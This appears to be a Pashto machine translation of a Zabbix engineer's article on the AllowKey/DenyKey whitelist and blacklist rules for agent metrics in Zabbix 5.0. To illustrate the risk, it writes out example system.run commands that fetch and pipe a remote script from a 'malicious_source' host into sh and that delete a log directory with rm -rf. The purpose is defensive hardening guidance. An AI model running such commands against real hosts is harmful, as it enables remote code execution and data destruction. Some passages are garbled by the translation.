په زبکس 5.0 کې د اجنټ اړخ میټریکونو لپاره تور لیست او سپین لیست ملاتړ

د اجنټ اړخ میټریکونو لپاره تور لیست او سپین لیست ملاتړ

تیخون اوسکوف، د ادغام انجنیر، زیبکس

د معلوماتو امنیت مسلې

Zabbix 5.0 یو نوی ځانګړتیا لري چې تاسو ته اجازه درکوي په سیسټمونو کې د Zabbix Agent په کارولو سره امنیت ښه کړي او زاړه پیرامیټر بدل کړي Remote Commands فعال کړئ.

د اجنټ پر بنسټ د سیسټمونو امنیت کې ښه والی د دې حقیقت څخه رامینځته کیږي چې یو اجنټ کولی شي لوی شمیر احتمالي خطرناک عملونه ترسره کړي.

• اجنټ کولی شي نږدې هر ډول معلومات راټول کړي ، پشمول محرم یا احتمالي خطرناک معلومات ، د تنظیم کولو فایلونو ، لاګ فایلونو ، پاسورډ فایلونو ، یا نورو فایلونو څخه.

د مثال په توګه، د zabbix_get افادیت په کارولو سره تاسو کولی شئ د کاروونکو لیست ته لاسرسی ومومئ، د دوی کور لارښودونه، د پټنوم فایلونه، او نور.

د zabbix_get افادیت په کارولو سره معلوماتو ته لاسرسی

یادونه. ډاټا یوازې هغه وخت ترلاسه کیدی شي چې اجنټ په اړونده فایل کې د لوستلو اجازه ولري. مګر، د بیلګې په توګه، فایل /etc/passwd/ د ټولو کاروونکو لخوا د لوستلو وړ.

• اجنټ کولی شي احتمالي خطرناک امرونه هم اجرا کړي. د مثال په توګه، کلیدي *system.run[]** تاسو ته اجازه درکوي د شبکې نوډونو کې هر ډول ریموټ کمانډونه اجرا کړئ ، پشمول د زبکس ویب انٹرفیس څخه چلولو سکریپټونه چې د اجنټ اړخ ته کمانډونه هم اجرا کوي.

# zabbix_get -s my.prod.host -k system.run["wget http://malicious_source -O- | sh"]

# zabbix_get -s my.prod.host -k system.run["rm -rf /var/log/applog/"]

• په لینکس کې، اجنټ د روټ امتیازاتو پرته د ډیفالټ په واسطه پرمخ ځي، پداسې حال کې چې په وینډوز کې دا د سیسټم په توګه د خدمت په توګه پرمخ ځي او د فایل سیسټم ته غیر محدود لاسرسی لري. په دې اساس، که چیرې د نصب کولو وروسته د زیبکس ایجنټ پیرامیټرو کې کوم بدلون نه وي راغلی، نو اجنټ راجسټری، فایل سیسټم ته لاسرسی لري او کولی شي د WMI پوښتنې اجرا کړي.

په پخوانیو نسخو کې پیرامیټر فعال Remote Commands=0 یوازې د کیلي سره میټریکونو غیر فعال کولو اجازه لري *system.run[]** او د ویب انټرفیس څخه سکریپټونه چلول، مګر د انفرادي فایلونو ته د لاسرسي محدودولو، د اجنټ سره نصب شوي انفرادي کیلي ته اجازه یا غیر فعالولو، یا د انفرادي پیرامیټونو کارول محدودولو لپاره هیڅ لاره شتون نلري.

د Zabbix په پخوانیو نسخو کې د EnableRemoteCommand پیرامیټر کارول

AllowKey/DenyKey

Zabbix 5.0 د اجنټ اړخ ته د میټریکونو اجازه ورکولو او ردولو لپاره د سپین لیستونو او تور لیستونو چمتو کولو سره د داسې غیر مجاز لاسرسي پروړاندې ساتنه کې مرسته کوي.

په زبیکس 5.0 کې ټولې کیلي ، پشمول *system.run[]** فعال شوي، او د اجنټ ترتیب کولو دوه نوي اختیارونه اضافه شوي:

AllowKey= - اجازه ورکړل شوي چکونه؛

DenyKey= - منع شوي چکونه؛

چیرې چې د پیرامیټرو سره د کلیدي نوم نمونه شتون لري چې میټاکریکٹرونه (*) کاروي.

د AllowKey او DenyKey کیلي تاسو ته اجازه درکوي چې د ځانګړي نمونې پراساس انفرادي میټریکونو ته اجازه ورکړئ یا رد کړئ. د نورو ترتیب کولو پیرامیټونو برعکس، د AllowKey/DenyKey پیرامیټونو شمیر محدود ندی. دا تاسو ته اجازه درکوي په روښانه ډول تعریف کړئ چې اجنټ په سیسټم کې د چکونو ونې رامینځته کولو سره څه شی کولی شي - د اجرا وړ کیلي ، چیرې چې هغه ترتیب چې دوی لیکل شوي خورا مهم رول لوبوي.

د قواعدو ترتیب

مقررات په ترتیب سره چک شوي چې په کوم کې دوی د ترتیب کولو فایل ته داخل شوي. کیلي د لومړۍ میچ څخه دمخه د مقرراتو سره سم چک کیږي ، او هرڅومره ژر چې د ډیټا عنصر کیلي د نمونې سره سمون ولري ، دا اجازه یا رد کیږي. له دې وروسته، د قواعدو چک کول ودریږي او پاتې کیلي له پامه غورځول کیږي.

له همدې امله، که چیرې یو عنصر د اجازې او انکار قاعدې سره سمون ولري، پایله به پدې پورې اړه ولري چې کوم قاعده د ترتیب کولو فایل کې لومړی دی.

2 مختلف قواعد د ورته نمونې او کلیدي سره vfs.file.size[/tmp/file]

د AllowKey/DenyKey کیلي کارولو ترتیب:

1. دقیق قواعد،
2. عمومي قواعد،
3. ممنوع قاعده

د مثال په توګه ، که تاسو په یو ځانګړي فولډر کې فایلونو ته لاسرسي ته اړتیا لرئ ، نو تاسو باید لومړی دوی ته لاسرسي ته اجازه ورکړئ ، او بیا هرڅه رد کړئ چې د تاسیس شوي اجازې دننه نه راځي. که د انکار قانون لومړی وکارول شي، فولډر ته لاسرسی به رد شي.

سمه ترتیب

که تاسو اړتیا لرئ د * له لارې 2 اسانتیاو ته اجازه ورکړئsystem.run[]**، او د انکار کولو قاعده به لومړی مشخص شي، اسانتیاوې به پیل نشي، ځکه چې لومړی نمونه به تل د هرې کلیمې سره سمون ولري، او ورپسې مقررات به له پامه غورځول شي.

غلط ترتیب

نمونه

اساسي اصول

نمونه د وائلډ کارډونو سره یو بیان دی. میټا کریکٹر (*) په یو ځانګړي موقعیت کې د هر ډول حروفونو سره سمون لري. Metacharacters دواړه په کلیدي نوم او پیرامیټونو کې کارول کیدی شي. د مثال په توګه، تاسو کولی شئ د متن سره لومړی پیرامیټر په کلکه تعریف کړئ، او راتلونکی د وائلډ کارډ په توګه مشخص کړئ.

پیرامیټونه باید په مربع قوسونو کې تړل شوي وي [].

• system.run[* - غلط
• vfs.file*.txt] - غلط
• vfs.file.*[*] - سمه ده

د وائلډ کارډ کارولو مثالونه.

1. په کلیدي نوم او په پیرامیټر کې. په دې حالت کې، کیلي د ورته کیلي سره مطابقت نلري چې پیرامیټر نلري، ځکه چې په نمونه کې موږ اشاره وکړه چې موږ غواړو د کلیدي نوم یو ټاکلی پای او د پیرامیټونو یو ټاکلی سیټ ترلاسه کړو.
2. که نمونه مربع بریکٹ نه کاروي، نمونه ټولو کیلي ته اجازه ورکوي چې پیرامیټونه نلري او ټول هغه کیلي ردوي چې ټاکل شوي پیرامیټر لري.
3. که کیلي په بشپړ ډول لیکل شوي وي او پیرامیټونه د وائلډ کارډ په توګه مشخص شوي وي، دا به د هر ډول پیرامیټرو سره ورته کیلي سره سمون ولري او د مربع بریکٹ پرته به کیلي سره سمون ونلري، د بیلګې په توګه دا به اجازه یا رد شي.

د پیرامیټونو ډکولو لپاره مقررات.

• که چیرې د پیرامیټونو سره کیلي د کارولو لپاره وي، پیرامیټونه باید د ترتیب کولو فایل کې مشخص شي. پیرامیټرونه باید د میټا کریکٹر په توګه مشخص شي. دا اړینه ده چې په احتیاط سره هرې فایل ته لاسرسی رد کړئ او په پام کې ونیسئ کوم معلومات چې میټریک کولی شي د مختلف املاونو لاندې چمتو کړي - د پیرامیټونو سره او پرته.

د پیرامیټونو سره د کیلي لیکلو ځانګړتیاوې

• که یو کیلي د پیرامیټونو سره مشخص شي، مګر پیرامیټونه اختیاري دي او د میټا کریکٹر په توګه مشخص شوي، د پیرامیټونو پرته یوه کیلي به حل شي. د مثال په توګه، که تاسو غواړئ په CPU کې د بار په اړه د معلوماتو ترلاسه کول غیر فعال کړئ او مشخص کړئ چې د system.cpu.load[*] کیلي باید غیر فعاله وي، مه هیروئ چې د پیرامیټونو پرته کیلي به د اوسط بار ارزښت بیرته راولي.

د پیرامیټونو ډکولو لپاره قواعد

یادښتونه

تعدیلات

• ځینې ​​مقررات د کارونکي لخوا نشي بدلیدلی، د بیلګې په توګه، د کشف قواعد یا د اجنټ د اتوماتیک ثبت کولو قواعد. AllowKey/DenyKey قواعد په لاندې پیرامیټونو اغیزه نه کوي:
  - د کوربه نوم توکي
  - HostMetadataItem
  - HostInterfaceItem

یادونه. که چیرې یو مدیر یو کیلي غیر فعال کړي، کله چې پوښتنه وشي، زیبکس پدې اړه معلومات نه ورکوي چې ولې میټریک یا کیلي په کټګورۍ کې راځينه ملاتړ شوی'. د ریموټ کمانډونو په اجرا کولو کې د ممانعتونو په اړه معلومات د اجنټ لاګ فایلونو کې هم ندي ښودل شوي. دا د امنیتي دلایلو لپاره دی، مګر کیدای شي ډیبګ کول پیچلي کړي که چیرې میټریکونه د ځینو دلیلونو لپاره په غیر ملاتړ شوي کټګورۍ کې راشي.

• تاسو باید د بهرني ترتیب فایلونو سره وصل کولو لپاره په کوم ځانګړي ترتیب تکیه ونه کړئ (د مثال په توګه ، د الفبا په ترتیب کې).

د کمانډ لاین اسانتیاوې

د مقرراتو تنظیم کولو وروسته ، تاسو اړتیا لرئ ډاډ ترلاسه کړئ چې هرڅه سم تنظیم شوي.

تاسو کولی شئ له دریو انتخابونو څخه یو وکاروئ:

• زبیبکس ته میټریک اضافه کړئ.
• سره ازموینه وکړئ zabbix_agentd. د اختیار سره د زیبکس ایجنټ -چاپ (-پ) ټولې کیلي ښیي (کوم چې د ډیفالټ لخوا اجازه لري) پرته له هغه چې د ترتیب لخوا اجازه نه ورکول کیږي. او د اختیار سره ازموینه (-t) ځکه چې منع شوي کیلي به بیرته راشي 'نه ملاتړ شوی توکي کیلي'.
• سره ازموینه وکړئ zabbix_ترلاسه. افادیت zabbix_ترلاسه د اختیار سره -k بیرته به راشيZBX_NOTSUPPORTED: نامعلوم میټریک'.

اجازه ورکړئ یا رد کړئ

تاسو کولی شئ فایل ته لاسرسی رد کړئ او تصدیق کړئ ، د مثال په توګه ، د افادیت په کارولو سره zabbix_ترلاسهدا فایل ته لاسرسی رد شوی دی.

**

یادونه. په پیرامیټر کې نرخونه له پامه غورځول شوي.

په دې حالت کې، دا ډول فایل ته لاسرسی ممکن د بلې لارې له لارې اجازه ورکړل شي. د مثال په توګه، که یو سیم لنک د دې لامل شي.

دا سپارښتنه کیږي چې د ټاکل شوي مقرراتو پلي کولو لپاره مختلف اختیارونه وڅیړئ، او د ممنوعاتو د مخنیوي امکانات هم په پام کې ونیسئ.

پوښتنې او ځوابونه

پوښتنه. ولې داسې پیچلې بڼه د خپلې ژبې سره د قواعدو، اجازې او ممانعتونو تشریح کولو لپاره غوره شوې؟ ولې دا ممکنه نه وه چې کارول شي، د بیلګې په توګه، منظم بیانونه چې زبیکس کاروي؟

ځواب. دا د ریجیکس فعالیت مسله ده ځکه چې معمولا یوازې یو استازی شتون لري او دا د میټریکونو لوی شمیر ګوري. ریجیکس خورا دروند عملیات دی او موږ نشو کولی پدې توګه زرګونه میټریک چیک کړو. وائلډ کارډونه - یو نړیوال، په پراخه کچه کارول شوی او ساده حل.

پوښتنه. ایا د شاملولو فایلونه د الفبا په ترتیب کې ندي شامل شوي؟

ځواب. تر هغه ځایه چې زه پوهیږم ، دا واقعیا ناممکن ده چې د هغه ترتیب وړاندوینه وکړئ چې په کوم کې به قواعد پلي شي که تاسو قواعد په مختلف فایلونو کې خپاره کړئ. زه وړاندیز کوم چې ټول AllowKey/DenyKey قواعد په یوه شامل فایل کې راټول کړئ، ځکه چې دوی یو له بل سره اړیکه لري، او د دې فایل په شمول.

پوښتنه. په زیبکس 5.0 کې اختیار 'Remote Commands فعالول=د ترتیب کولو فایل څخه ورک دی، او یوازې AllowKey/DenyKey شتون لري؟

ځواب. هو دا صحیح دی.

ستاسو د پاملرنې مننه!

سرچینه: www.habr.com